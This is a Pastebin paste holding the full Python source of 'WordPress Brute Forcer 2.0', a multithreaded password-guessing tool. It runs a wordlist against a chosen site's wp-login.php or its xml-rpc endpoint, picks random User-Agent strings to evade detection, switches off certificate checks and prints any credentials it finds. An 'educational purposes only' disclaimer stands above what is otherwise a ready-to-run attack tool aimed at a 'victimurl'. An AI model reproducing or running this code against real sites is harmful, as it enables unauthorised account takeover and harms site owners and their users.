API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 31st, 2017
514
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.06 KB | None | 0 0
raw download clone embed print report
  1. WORDPRESS BRUTE FORCER 2.0
  2. WordPress Brute Force by Claudio Viviani
  3. Inspired by xSecurity's WordPress Brute Muliththreading
  4. Tested on Wordpress 3.x and 4.x
  5. Disclaimer:
  6. This tool is intended for educational purposes only and the author can not be held liable for any kind of damages done whatsoever to your machine, or damages caused by some other,creative application of this exploit. In any case you disagree with the above statement,stop here.
  7. Requirements:
  8. 1) python's httplib2 lib
  9. Installation: pip install httplib2
  10. Features:
  11. 1) Multithreading
  12. 2) xml-rpc brute force mode
  13. 3) http and https protocols support
  14. 4) Random User Agent
  15.  
  16. #!/usr/bin/env python
  17. import urllib, httplib, httplib2
  18. import socket, sys, os, os.path, argparse, random
  19. from threading import Thread
  20. from time import sleep
  21. banner = """
  22. ___ ___ __
  23. | Y .-----.----.--| .-----.----.-----.-----.-----.
  24. |. | | _ | _| _ | _ | _| -__|__ --|__ --|
  25. |. / \ |_____|__| |_____| __|__| |_____|_____|_____|
  26. |: | |__|
  27. |::.|:. |
  28. `--- ---'
  29. _______ __ _______
  30. | _ .----.--.--| |_.-----| _ .-----.----.----.-----.
  31. |. 1 | _| | | _| -__|. 1___| _ | _| __| -__|
  32. |. _ |__| |_____|____|_____|. __) |_____|__| |____|_____|
  33. |: 1 \ |: |
  34. |::.. . / |::.|
  35. `-------' `---'
  36. W0rdBRUTEpr3ss v2.0
  37. Written by:
  38. Claudio Viviani
  39. http://www.homelab.it
  40. info@homelab.it
  41. homelabit@protonmail.ch
  42. http://ffhd.homelab.it (Free Fuzzy Hashes Database)
  43. https://www.facebook.com/homelabit
  44. https://twitter.com/homelabit
  45. https://plus.google.com/+HomelabIt1/
  46. https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
  47. """
  48. def randomAgentGen():
  49. userAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  50. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  51. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
  52. 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  53. 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
  54. 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
  55. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
  56. 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  57. 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
  58. 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
  59. 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  60. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0',
  61. 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  62. 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  63. 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
  64. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  65. 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
  66. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  67. 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
  68. 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  69. 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0',
  70. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  71. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  72. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  73. 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
  74. 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  75. 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
  76. 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
  77. 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  78. 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
  79. 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
  80. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4',
  81. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2',
  82. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46',
  83. 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
  84. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  85. 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
  86. 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  87. 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
  88. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
  89. 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
  90. 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  91. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
  92. 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36',
  93. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
  94. 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
  95. 'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
  96. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  97. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  98. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
  99. 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
  100. 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
  101. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
  102. 'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
  103. 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
  104. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0',
  105. 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',
  106. 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  107. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0',
  108. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
  109. 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
  110. 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
  111. 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  112. 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  113. 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
  114. 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
  115. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  116. 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',
  117. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  118. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0',
  119. 'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0',
  120. 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36',
  121. 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
  122. 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  123. 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  124. 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
  125. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
  126. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
  127. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']
  128. UA = random.choice(userAgent)
  129. return UA
  130. def urlCMS(url,brutemode):
  131. if url[:8] != "https://" and url[:7] != "http://":
  132. print('\n[X] You must insert http:// or https:// procotol')
  133. os._exit(1)
  134. # Page login
  135. if brutemode == "std":
  136. url = url+'/wp-login.php'
  137. else:
  138. url = url+'/xmlrpc.php'
  139. return url
  140. def bodyCMS(username,pwd,brutemode):
  141. if brutemode == "std":
  142. body = { 'log':username,
  143. 'pwd':pwd,
  144. 'wp-submit':'Login',
  145. 'testcookie':'1' }
  146. else:
  147. body = """<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>wp.getUsersBlogs</methodName>
  148. <params><param><value>%s</value></param><param><value>%s</value></param></params></methodCall>""" % (username, pwd)
  149. return body
  150.  
  151. def headersCMS(UA,lenbody,brutemode):
  152. if brutemode == "std":
  153. headers = { 'User-Agent': UA,
  154. 'Content-type': 'application/x-www-form-urlencoded',
  155. 'Cookie': 'wordpress_test_cookie=WP+Cookie+check' }
  156. else:
  157. headers = { 'User-Agent': UA,
  158. 'Content-type': 'text/xml',
  159. 'Content-Length': "%d" % len(lenbody)}
  160. return headers
  161. def responseCMS(response):
  162. if response['set-cookie'].split(" ")[-1] == "httponly":
  163. return "1"
  164. def connection(url,user,password,UA,timeout,brutemode):
  165. username = user
  166. pwd = password
  167. http = httplib2.Http(timeout=timeout, disable_ssl_certificate_validation=True)
  168. # HTTP POST Data
  169. body = bodyCMS(username,pwd,brutemode)
  170. # Headers
  171. headers = headersCMS(UA,body,brutemode)
  172. try:
  173. if brutemode == "std":
  174. response, content = http.request(url, 'POST', headers=headers, body=urllib.urlencode(body))
  175. if str(response.status)[0] == "4" or str(response.status)[0] == "5":
  176. print('[X] HTTP error, code: '+str(response.status))
  177. os._exit(1)
  178. if responseCMS(response) == "1":
  179. print('\n')
  180. print('[!] Password FOUND!!!')
  181. print('')
  182. print('[!] Username: '+user+' Password: '+password)
  183. os._exit(0)
  184. checkCon = "OK"
  185. return checkCon
  186. else:
  187. response, content = http.request(url, 'POST', headers=headers, body=body)
  188. if str(response.status)[0] == "4" or str(response.status)[0] == "5":
  189. print('[X] HTTP error, code: '+str(response.status))
  190. os._exit(1)
  191. # Remove all blank and newline chars
  192. xmlcontent = content.replace(" ", "").replace("\n","")
  193. if not "403" in xmlcontent:
  194. print('\n')
  195. print('[!] Password FOUND!!!')
  196. print('')
  197. print('[!] Username: '+user+' Password: '+password)
  198. os._exit(0)
  199. checkCon = "OK"
  200. return checkCon
  201. except socket.timeout:
  202. print('[X] Connection Timeout')
  203. os._exit(1)
  204. except socket.error:
  205. print('[X] Connection Refused')
  206. os._exit(1)
  207. except httplib.ResponseNotReady:
  208. print('[X] Server Not Responding')
  209. os._exit(1)
  210. except httplib2.ServerNotFoundError:
  211. print('[X] Server Not Found')
  212. os._exit(1)
  213. except httplib2.HttpLib2Error:
  214. print('[X] Connection Error!!')
  215. os._exit(1)
  216. commandList = argparse.ArgumentParser(sys.argv[0])
  217. commandList.add_argument('-S', '--standard',
  218. action="store_true",
  219. dest="standard",
  220. help="Standard login brute",
  221. )
  222. commandList.add_argument('-X', '--xml-rpc',
  223. action="store_true",
  224. dest="xml",
  225. help="Xml-rpc login brute",
  226. )
  227. commandList.add_argument('-t', '--target',
  228. action="store",
  229. dest="target",
  230. help="Insert URL: http[s]://www.victimurl.com[:port]",
  231. )
  232. commandList.add_argument('-u', '--username',
  233. action="store",
  234. dest="username",
  235. help="Insert username",
  236. )
  237. commandList.add_argument('-w', '--wordfilelist',
  238. action="store",
  239. dest="wordfilelist",
  240. help="Insert wordlist file",
  241. )
  242. commandList.add_argument('--timeout',
  243. action="store",
  244. dest="timeout",
  245. default=10,
  246. type=int,
  247. help="Timeout Value (Default 10s)",
  248. )
  249. options = commandList.parse_args()
  250. # Check bruteforce mode conflicts
  251. if options.standard and options.xml:
  252. print "\n[X] Select standard [-S] OR xml-rpc [-X] bruteforce mode"
  253. sys.exit(1)
  254. # Check args
  255. if not options.standard and not options.xml:
  256. print(banner)
  257. print
  258. commandList.print_help()
  259. sys.exit(1)
  260. elif not options.target or not options.username or not options.wordfilelist:
  261. print(banner)
  262. print
  263. commandList.print_help()
  264. sys.exit(1)
  265. # Set bruteforce mode
  266. if options.standard:
  267. brtmd="std"
  268. else:
  269. brtmd="xml"
  270. # args to vars
  271. url = options.target
  272. user = options.username
  273. password = options.wordfilelist
  274. timeout = options.timeout
  275.  
  276. # Check if Wordlist file exists and has readable
  277. if not os.path.isfile(password) and not os.access(password, os.R_OK):
  278. print "[X] Wordlist file is missing or is not readable"
  279. sys.exit(1)
  280. # Open and read Wordlist file
  281. wordlist = open(password).read().split("\n")
  282. # Remove last empty values from wordlist list
  283. del wordlist[-1]
  284. # Total lines (password) in Wordlist file
  285. totalwordlist = len(wordlist)
  286. # Gen Random UserAgent
  287. UA = randomAgentGen()
  288. # Url to url+login_cms_page
  289. url = urlCMS(url,brtmd)
  290. print(banner)
  291. print
  292. print('[+] Target.....: '+options.target)
  293. print('[+] Wordlist...: '+str(totalwordlist))
  294. print('[+] Username...: '+user)
  295. if brtmd == "std":
  296. print('[+] BruteMode..: Standard')
  297. else:
  298. print('[+] BruteMode..: Xml-Rpc')
  299. print('[+]')
  300. print('[+] Connecting.......')
  301. print('[+]')
  302. # Check connection with fake-login
  303. if connection(url,user,UA,UA,timeout,brtmd) == "OK":
  304. print('[+] Connection established')
  305. # Reset var for "progress bar"
  306. count = 0
  307. threads = []
  308. for pwd in wordlist:
  309. count += 1
  310. t = Thread(target=connection, args=(url,user,pwd,UA,timeout,brtmd))
  311. t.start()
  312. threads.append(t)
  313. sys.stdout.write('\r')
  314. sys.stdout.write('[+] Password checked: '+str(count)+'/'+str(totalwordlist))
  315. sys.stdout.flush()
  316. sleep(0.210)
  317. for a in threads:
  318. a.join()
  319. # no passwords found
  320. print('\n[X] Password NOT found :(')
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!